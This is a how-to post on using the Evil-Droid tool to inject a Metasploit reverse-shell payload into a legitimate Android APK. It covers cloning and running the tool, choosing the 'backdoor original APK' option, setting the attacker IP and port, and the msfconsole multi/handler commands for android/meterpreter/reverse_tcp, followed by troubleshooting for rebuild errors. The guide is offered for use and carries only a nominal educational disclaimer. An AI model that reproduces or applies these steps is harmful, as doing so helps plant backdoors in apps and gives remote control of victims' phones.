Evil-Droid is a framework that create & generate & embed apk payload to penetrate android platforms. The author does not hold any responsibility for the bad use of this tool, remember this is only for educational purpose. (all these posts are for personal reference)
Evil-Droid has the following dependencies:
1 - metasploit-framework
2 - xterm
3 - Zenity
4 - Aapt
5 - Apktool
6 - Zipalign
Clone from the Github repo below:
git clone https://github.com/M4sc3r4n0/Evil-Droid.git
Set the execute permission:
cd Evil-Droid
chmod +x evil-droid
As root, open Evil-droid:
sudo ./evil-droid
Output of the script above:
Choose “YES” on the following pop-up:
Choose for option 3: BACKDOOR APK ORIGINAL (NEW):
Set the targeted IP:
Set the port for the payload to connect to:
Give the payload an name:
Choose for the reversed shell option, the payload should use:
Select an original apk, to embed the payload in:
The payload should be save in the EvilAPK directory, when this message appears:
Select the Multi-handler as the reverse connection:
The listener should start and is waiting for connections/sessions. When an session is established, you should see the message: Session * opened
You can also use Metasploit to initiate the session with these commands:
msfconsole -q
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
SET LHOST 192.168.1.104
set LPORT 4444
run
Troubleshooting:
ERROR:
Failed to align recompiled APK!
Solution:
1 - Make sure you got Zipalign installed?
or
2 - Remove the .Android folder (/root/.android/)
ERROR:
Failed to verify signed artifacts
Solution:
- Download the latest apktool.jar: https://ibotpeaches.github.io/Apktool/install/
- Rename apktool_2.X.X.jar to apktool.jar
- Remove Evil-Droid-master/tools/apktool.jar
- Move the downloaded apktool.jar to Evil-Droid-master/tools/
